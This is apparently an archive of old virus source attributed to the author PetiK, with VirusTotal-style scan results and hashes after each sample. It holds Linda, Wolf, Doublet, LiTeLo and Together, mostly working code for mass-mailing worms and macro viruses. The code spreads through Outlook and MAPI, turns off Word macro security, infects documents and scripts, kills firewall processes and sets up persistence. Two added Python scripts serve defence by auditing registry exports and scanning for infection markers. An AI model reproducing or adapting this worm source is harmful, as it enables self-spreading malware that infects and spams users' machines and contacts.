ws.RegWrite cv&"\RegisteredOrganization","Love Linda"
ws.RegWrite cv&"\Run\LoveLinda",sys&"\lindamail.vbs"
Set mail=fso.CreateTextFile(sys&"\lindamail.vbs", 2)
mail.WriteLine "On Error Resume Next"
mail.WriteLine "Set out=CreateObject(""Outlook.Application"")"
mail.WriteLine "Set B=out.GetNameSpace(""MAPI"")"
mail.WriteLine "For Each C In B.AddressLists"
mail.WriteLine "If C.AddressEntries.Count <> 0 Then"
mail.WriteLine "For D=1 To C.AddressEntries.count"
mail.WriteLine "Set em=C.AddressEntries(D)"
mail.WriteLine "Set lm=out.CreateItem(0)"
mail.WriteLine "lm.To=em.Address"
mail.WriteLine "lm.Subject=""Love Message..."""
mail.WriteLine "lm.Body=""Read this beautiful love message."""
mail.WriteLine "lm.Attachments.Add(""" &win& "\LoveLinda.htm"")"
mail.WriteLine "lm.DeleteAfterSubmit=True"
mail.WriteLine "If lm.To <> """" Then"
mail.WriteLine "F.Send"
mail.WriteLine "End If"
mail.WriteLine "Next"
mail.WriteLine "End If"
mail.WriteLine "Next"
End If
Function create(doss)
Set FolderObj = fso.GetFolder(doss)
Set FO = FolderObj.Files
For each file in FO
ext = lcase(fso.GetExtensionName(file.Name))
if ext="ini" or ext="txt" or ext="bmp" or ext="doc" or ext="xls" or ext="mp3" or ext="hlp" or ext="inf" Then
Set linda = fso.CreateTextFile(file.path&".htm", 2)
Set love = document.body.createTextRange
linda.WriteLine "<html><head><title>Love Linda</title>"
linda.WriteLine "<body bgColor=blue>"
linda.WriteLine love.htmltext
linda.WriteLine "</body></html>"
linda.Close
end if
next
End Function
</script></body></html>
File Linda.htm received on 05.16.2009 17:51:29 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Bubbleboy!IK
AhnLab-V3 5.0.0.2 2009.05.16 HTML/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.04
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 JS/Mailer.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.CC1D1675
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.16 WORM.Virus
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Nilda
F-Prot 4.4.4.56 2009.05.16 JS/Mailer.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 JS/Mailer.A
GData 19 2009.05.16 Generic.ScriptWorm.CC1D1675
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Bubbleboy
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Generic@MM
McAfee+Artemis 5616 2009.05.15 VBS/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.04
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 HTML/Worm.gen
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.K
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.16 VBS.Lovlind.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 VBS/Petik-N
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 HTML_LINDA.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.16 VBS.Lovlind.A
Additional information
File size: 2755 bytes
MD5...: 43ac95142a5c7281246b68ef0584e079
SHA1..: 66758177710fcdd652c37671efe593f7651248e2
' Name : W97M.Wolf
' Author : PetiK
' Language : VBA Word
' Date : 25/02/2002
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
MsgBox "Very Thanx to Tex Avery. hahahahaha", vbInformation, "W97M.Wolf.A"
Application.UserName = "My Name is Wolf"
End Sub
Sub AutoClose()
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Wolf"
.Title = "My Friend the Wolf"
.Subject = "Tex Avery and the other"
.Keywords = "Wolf, Tex Avery, Ed Love, Droopy"
.Comments = "No comments"
.Execute
End With
If Left(ActiveDocument.Name, 8) <> "Document" And ActiveDocument.Saved = False Then
ActiveDocument.Save
End If
End Sub
Sub Infection()
On Error Resume Next
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
DropFile = "C:\Wolf.sys"
If Nor.Item("Wolf").Name <> "Wolf" Then
Doc("Wolf").Export DropFile
Nor.Import DropFile
End If
If Doc.Item("Wolf").Name <> "Wolf" Then
Nor("Wolf").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
End Sub
Sub SearchF()
With Application.FileSearch
.FileName = "*.doc"
.LookIn = "C:\"
.SearchSubFolders = False
.FileType = msoFileTypeWordDocuments
.Execute
For I = 1 To .FoundFiles.Count
FileSystem.SetAttr .FoundFiles(I), vbNormal
Next I
End With
End Sub
Sub EndProtect()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub
Sub Payload()
MyApp = Shell("notepad.exe", 1)
SendKeys "This is my last Word97Macro virus.", True
AppActivate (MyApp)
End Sub
File Wolf.doc received on 05.11.2009 21:18:10 (CET)
Additional information
File size: 40960 bytes
MD5...: 456d71a02c519c6a1f13fa9ffc899f2e
SHA1..: 534f5ae68f8634c6c69a5b40ad131a4bf674d000
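Wolf's EndProtect() lowers Word's macro security by writing Level = 1 and AccessVBOM = 1 under HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Word\Security; Doublet, further down, writes the same values both from VBA and through WScript.Shell.RegWrite. Level 1 is "Low" (macros run without prompting) and AccessVBOM = 1 is "Trust access to Visual Basic Project", the switch that lets a macro reach VBProject.VBComponents and so import itself into Normal.dot. On a suspect machine those values can be checked offline from a reg export file. The Python below is an added example, not code from the archive: it parses the .reg format and flags any Office application's Security key (it generalises beyond Word) whose Level is below Medium or whose AccessVBOM is set. The .reg text is constructed.

```python
"""Audit a .reg export of HKCU\Software\Microsoft\Office for the macro security
values that Wolf's EndProtect() and Doublet's FuckProtect() force to 1.
Added example, not part of the archive; the .reg text below is constructed."""
import re

KEY_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')
SECURITY_KEY_RE = re.compile(r"\\Office\\(\d+\.\d+)\\(\w+)\\Security$", re.I)

# Office 9.0/10.0 semantics: Level 1 = Low (macros run without prompting),
# 2 = Medium, 3 = High. AccessVBOM = 1 = "Trust access to Visual Basic Project",
# which is what lets a macro call VBComponents.Import/Export on Normal.dot.


def parse_reg(text):
    """Return {key_path: {value_name: int}} for the dword values of a .reg export.
    Real exports are UTF-16 with a BOM: open(path, encoding="utf-16") before calling."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = DWORD_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = int(m.group(2), 16)
    return keys


def audit_office_security(keys):
    """Return (app, version, value_name, value, why) for each weakened setting."""
    findings = []
    for path, values in keys.items():
        m = SECURITY_KEY_RE.search(path)
        if not m:
            continue
        version, app = m.groups()
        level = values.get("Level")
        if level is not None and level < 2:
            findings.append((app, version, "Level", level,
                             "security Low: macros run without prompting"))
        if values.get("AccessVBOM") == 1:
            findings.append((app, version, "AccessVBOM", 1,
                             "VBA project object model trusted: macros may import modules"))
    return findings


# Constructed export: Word 9.0 untouched, Word 10.0 and Excel 10.0 weakened.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000003

[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]
"Level"=dword:00000001
"AccessVBOM"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security]
"Level"=dword:00000001
"""

if __name__ == "__main__":
    for finding in audit_office_security(parse_reg(SAMPLE_REG)):
        print(finding)
```

The same two values are what a hardening baseline should pin (Level at 2 or 3, AccessVBOM absent or 0), so the audit doubles as a drift check against that baseline.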
' Name : VBS/W97M.Doublet
' Author : PetiK
' Language : VBS
' Date : 02/03/2002
personal=ws.SpecialFolders("MyDocuments")
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\Doublet.vbs")
Set vw=sf.CreateTextFile("C:\Doublet.sys")
vw.WriteLine "Attribute VB_Name = ""Doublet"""
vw.WriteLine "Sub AutoOpen()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Call FuckProtect"
vw.WriteLine "Call Infect"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub HelpAbout()"
vw.WriteLine "If Day(Now) = 10 Then"
vw.WriteLine "MsgBox ""W97M/VBS.Doublet. Hahahahaha"", vbInformation, ""For "" + Application.UserName"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub Infect()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Set Nor = NormalTemplate.VBProject.VBComponents"
vw.WriteLine "Set Doc = ActiveDocument.VBProject.VBComponents"
vw.WriteLine "Drop = ""C:\Doublet.sys"""
vw.WriteLine "If Nor.Item(""Doublet"").Name <> ""Doublet"" Then"
vw.WriteLine " Doc(""Doublet"").Export Drop"
vw.WriteLine " Nor.Import Drop"
vw.WriteLine "End If"
vw.WriteLine "If Doc.Item(""Doublet"").Name <> ""Doublet"" Then"
vw.WriteLine " Nor(""Doublet"").Export Drop"
vw.WriteLine " Doc.Import Drop"
vw.WriteLine " ActiveDocument.Save"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub FuckProtect()"
vw.WriteLine "With Options"
vw.WriteLine " .ConfirmConversions = False"
vw.WriteLine " .VirusProtection = False"
vw.WriteLine " .SaveNormalPrompt = False"
vw.WriteLine "End With"
vw.WriteLine "Select Case Application.Version"
vw.WriteLine "Case ""10.0"""
vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&"
vw.WriteLine "Case ""9.0"""
vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "End Select"
vw.WriteLine "WordBasic.DisableAutoMacros 0"
vw.WriteLine "End Sub"
vw.Close
lecteur()
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
Set out=CreateObject("Outlook.Application")
Set MA=out.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\"&tmpname)
subject="Re: " & left(tmpname,len(tmpname)-4) & " for you."
Set AD=C.AddressEntries(D)
Set mail=out.CreateItem(0)
mail.To=AD.Address
mail.Subject=subject
body="Hi " & AD.Name & ","
body = body & VbCrLf & "Look at this attached found on the net."
body = body & VbCrLf & ""
body = body & VbCrLf & " See you soon"
mail.Body=body
mail.Attachments.Add(sf.GetSpecialFolder(0)&"\"&tmpname)
mail.DeleteAfterSubmit=True
If mail.To <> "" Then
mail.Send
sf.DeleteFile sf.GetSpecialFolder(0)&"\"&tmpname
End If
Next
End If
Next
Set wrd=WScript.CreateObject("Word.Application")
If wrd Is Nothing Then WScript.Quit
wrd.Visible=False
Set srch = wrd.Application.FileSearch
srch.Lookin = ""&personal&"": srch.SearchSubFolders = True: srch.FileName="*.doc": srch.Execute
For f = 1 To srch.FoundFiles.Count
victim = srch.FoundFiles(f)
wrd.Documents.Open victim
Set Doc=wrd.ActiveDocument.VBProject.VBComponents
If Doc.Item("Doublet").Name <> "Doublet" Then
Doc.Import ("C:\Doublet.sys")
wrd.ActiveDocument.Save
End If
wrd.ActiveDocument.Close
Next
wrd.Application.Quit
Sub lecteur()
On Error Resume Next
dim f,f1,fc
Set dr = sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub
Sub infecte(dossier)
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set f = sf.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = sf.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe") Then
Set cot=sf.OpenTextFile(f1.path, 1, False)
If cot.ReadLine <> "'VBS/W97M.Doublet" then
cot.Close
Set cot=sf.OpenTextFile(f1.path, 1, False)
vbsorg=cot.ReadAll()
cot.Close
Set inf=sf.OpenTextFile(f1.path,2,True)
inf.WriteLine "'VBS/W97M.Doublet"
inf.Write(vbsorg)
inf.WriteLine ""
inf.WriteLine virus
inf.Close
End If
End If
Next
End Sub
Sub liste(dossier)
On Error Resume Next
Set f = sf.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
File Doublet.vbs received on 05.16.2009 11:30:45 (CET)
Additional information
File size: 5258 bytes
MD5...: bdd4e8ab9db0d5e79474cb50f1f0ebda
SHA1..: 303d4183f401e9bf707dab9d05d993e329f71753
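Macrophage tags every .htm/.html/.htz/.hta/.asp it infects with a first line of <macrophage>, and Doublet tags every .vbs/.vbe with 'VBS/W97M.Doublet; both read that line back to avoid reinfecting a file, which makes it an equally reliable indicator for a defender. Macrophage and Linda also share a behaviour a legitimate page almost never has: VBScript embedded in HTML that instantiates Scripting.FileSystemObject in order to write files from inside the browser. The Python below is an added example, not part of the archive: it walks a directory tree, checks first lines against those two markers, applies the VBScript plus FileSystemObject heuristic, and reports what it found. The sample files it creates are constructed stand-ins, not the infectors.

```python
"""Scan a directory tree for the prepend-infection markers and the in-browser
file-system access pattern used by the script infectors on this page.
Added example, not part of the archive; the sample files are constructed."""
import os
import re
import tempfile

# First-line markers taken from the listings: Macrophage writes "<macrophage>"
# as line 1 of each .htm/.html/.htz/.hta/.asp; Doublet writes "'VBS/W97M.Doublet"
# as line 1 of each .vbs/.vbe.
KNOWN_MARKERS = {
    "<macrophage>": "VBS.Macrophage prepend marker",
    "'VBS/W97M.Doublet": "VBS/W97M.Doublet prepend marker",
}
SCAN_EXT = {".htm", ".html", ".htz", ".hta", ".asp", ".vbs", ".vbe"}

# Behaviour shared by Macrophage and Linda: a VBScript block inside an HTML page
# that instantiates Scripting.FileSystemObject.
VBS_BLOCK = re.compile(r"<script[^>]*language\s*=\s*['\"]?vbscript", re.I)
FSO_CALL = re.compile(r"CreateObject\(\s*[\"']Scripting\.FileSystemObject[\"']\s*\)", re.I)


def classify(text):
    """Return the list of findings for one file's contents (empty means nothing flagged)."""
    findings = []
    first_line = text.split("\n", 1)[0].rstrip("\r")
    if first_line in KNOWN_MARKERS:
        findings.append(KNOWN_MARKERS[first_line])
    if VBS_BLOCK.search(text) and FSO_CALL.search(text):
        findings.append("inline VBScript using Scripting.FileSystemObject")
    return findings


def scan_tree(root):
    """Walk root and return {relative_path: findings} for every flagged file."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1", errors="replace") as fh:
                findings = classify(fh.read())
            if findings:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return hits


def build_sample_tree():
    """Create a temporary tree of constructed files (no real infector code) and return it."""
    root = tempfile.mkdtemp(prefix="prepend_scan_")
    os.mkdir(os.path.join(root, "sub"))
    samples = {
        "clean.htm": "<html><body>Hello</body></html>\n",
        # marker line, the original page, then an appended script block
        "infected.htm": ("<macrophage>\n<html><body>Hello</body></html>\n"
                         "<SCRIPT Language=VBScript>\n"
                         "Set fso=CreateObject(\"Scripting.FileSystemObject\")\n"
                         "</script>\n"),
        "sub/tool.vbs": "'VBS/W97M.Doublet\nWScript.Echo \"original script\"\n",
        "notes.txt": "<macrophage>\nnot a scanned extension\n",  # ignored on purpose
    }
    for rel, content in samples.items():
        with open(os.path.join(root, *rel.split("/")), "w", encoding="latin-1") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, why in scan_tree(build_sample_tree()).items():
        print(rel, "->", "; ".join(why))
```

Point scan_tree at the folders the infectors target (the Windows directory, the system directory and the user's Personal folder, as read from Shell Folders in the listings) rather than at a whole drive; the marker check is exact, so a hit is a confirmed infection, while the heuristic only says the file deserves a manual look.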
/*
Name : I-Worm.LiTeLo
Author : PetiK
Date : March 7th 2002 - March 10th 2002
Language : C++/HTML
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#pragma argused
char filename[50],copysys[50],copyreg[50],htmf[50],fakemess[1024];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
Uninst="Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\LiteLo";
char dn[20]="Flash32 Uninstall",ust[40];
BYTE htmail[10];
DWORD Tmp,type=REG_SZ,shtmail=sizeof(htmail);
LPTSTR cmdLine,ptr;
BOOL installed,uninstall;
HMODULE kernel32;
FILE *htm;
LHANDLE session;
MapiMessage *mess;
HINSTANCE WiNet,hMAPI;
char messId[512],mname[50],maddr[30];
char *attname[]={"flash32.exe","flsh32eng.exe","flsh32fr.exe","new_flash.exe",
"freeflash32.exe","installflash.exe","setupflash.exe"};
HKEY hReg;
SYSTEMTIME systime;
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
kernel32=GetModuleHandle("KERNEL32.DLL");
if(kernel32) {
(FARPROC &)RegSerPro=GetProcAddress(kernel32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)copysys,100);
strcpy(htmf,copysys);
strcat(copysys,"\\Flash32.exe");
strcat(htmf,"\\FlashNet.htm");
installed=FALSE;
uninstall=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
case 'u':
installed=TRUE;
uninstall=TRUE;
break;
}
}
}
if(!installed) {
CopyFile(filename,copysys,FALSE);
strcpy(copyreg,copysys);
strcat(copyreg," -i");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Flash32",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg);
strcpy(ust,copysys);
strcat(ust," -u");
RegCreateKey(HKEY_LOCAL_MACHINE,Uninst,&hReg);
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
RegCloseKey(hReg);
htm=fopen(htmf,"w");
fprintf(htm,"%s",htmms);
fclose(htm);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall"
,0,KEY_ALL_ACCESS,&hReg);
RegDeleteKey(hReg,"LiteLo");
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_ALL_ACCESS,&hReg);
RegDeleteValue(hReg,"HTMail");
RegCloseKey(hReg);
DeleteFile(htmf);
WritePrivateProfileString("rename","NUL",copysys,"WININIT.INI");
MessageBox(NULL,"Please restart the system.","Uninstall Flash32",MB_OK|
MB_ICONHAND);
ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);
ExitProcess(0);
}
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"HTMail",0,&type,htmail,&shtmail);
RegCloseKey(hReg);
if(strcmp(htmail,"OK")!=0) {
ShellExecute(NULL,"open",htmf,NULL,NULL,SW_SHOWMAXIMIZED);
}
cworm:
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
strcpy(mname,mess->lpOriginator->lpszName);
strcpy(maddr,mess->lpOriginator->lpszAddress);
mess->ulReserved=0;
mess->lpszSubject="New! New! Version of Flash";
mess->lpszNoteText="Hi,\nLook at this demo version of Flash.\n\nIt's easy and free.";
mess->lpszMessageType=NULL;
mess->lpszDateReceived=NULL;
mess->lpszConversationID=NULL;
mess->flFlags=MAPI_SENT;
mess->lpOriginator->ulReserved=0;
mess->lpOriginator->ulRecipClass=MAPI_ORIG;
mess->lpOriginator->lpszName=mess->lpRecips->lpszName;
mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress;
mess->nRecipCount=1;
mess->lpRecips->ulReserved=0;
mess->lpRecips->ulRecipClass=MAPI_TO;
mess->lpRecips->lpszName=mname;
mess->lpRecips->lpszAddress=maddr;
mess->nFileCount=1;
mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mess->lpFiles, 0, sizeof(MapiFileDesc));
mess->lpFiles->ulReserved=0;
mess->lpFiles->flFlags=NULL;
mess->lpFiles->nPosition=-1;
mess->lpFiles->lpszPathName=filename;
mess->lpFiles->lpszFileName=attname[GetTickCount()&6];
mess->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mess, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mess->lpFiles);
mFreeBuffer(mess);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
}
File Litelo.exe received on 05.16.2009 17:51:36 (CET)
Additional information
File size: 28672 bytes
MD5...: 4292a1ade77cb9e51e3de52101c99dcb
SHA1..: b485fdd64fda5d12221f83be8c062588f051b2c6
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Together
Author : PetiK
Date : March 10th 2002 - March 15th 2002
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS
include Useful.inc
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file
push 50
push offset verif_worm
api GetSystemDirectoryA
@pushsz "\EBASE64.EXE"
push offset verif_worm
api lstrcat
push 0
push edi
push esi
api CopyFileA ; copy file
push 20
push edi
push 1
@pushsz "Encode Base64"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit
jmp end_worm
continue_worm:
fuck_antivirus:
@pushsz "OIFIL400.DLL"
api LoadLibraryA
test eax,eax
jz end_fuck_antivirus
push 0
push 2
api CreateToolhelp32Snapshot
inc eax
jz end_fuck_antivirus
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
checkfile:
test eax, eax
jz InfExpRetCl
push ecx
mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextFile
lea ebx,[uProcess.szExeFile]
@pushsz "ZONEALARM.EXE"
push ebx
api lstrstr
test eax,eax
jz NextFile
term: push [uProcess.th32ProcessID]
push 1
push 001F0FFFh
api OpenProcess
test eax,eax
jz NextFile
push 0
push eax
api TerminateProcess
push ebx
push offset new_name
api lstrcpy
mov esi,offset new_name
push esi
api lstrlen
add esi,eax
sub esi,4
mov [esi],"ktp."
lodsd
; mov [esi],"kmz."
; lodsd
push 0
push offset new_name
push ebx
api CopyFileA
push ebx
api DeleteFileA
NextFile:
push offset uProcess
push lSnapshot
api Process32Next
jmp checkfile
InfExpRetCl:
push lSnapshot
api CloseHandle
end_fuck_antivirus:
call Spread_Mirc
call Spread_Worm
e_s_w:
end_worm:
push 0
api ExitProcess
hide_worm Proc
pushad
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset copy_worm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP
Spread_Worm Proc
pushad
push 50
push offset vbs_worm
api GetSystemDirectoryA
@pushsz "\eBase.vbs"
push offset vbs_worm
api lstrcat
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbs_worm
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_vbs - s_vbs
push offset s_vbs
push ebp
api WriteFile
push ebp
api CloseHandle
push 1
push 0
push 0
push offset vbs_worm
@pushsz "open"
push 0
api ShellExecuteA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset t_ini
api GetSystemDirectoryA
@pushsz "\together.ini"
push offset t_ini
api lstrcat
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset t_ini
api CreateFileA
inc eax
je end_spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_spread_worm:
popad
jmp e_s_w
Spread_Worm EndP
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
; === Copy Worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
verif_worm db 50 dup (0)
sysTime db 16 dup(0)
Message dd ?
dd offset subject
dd offset body
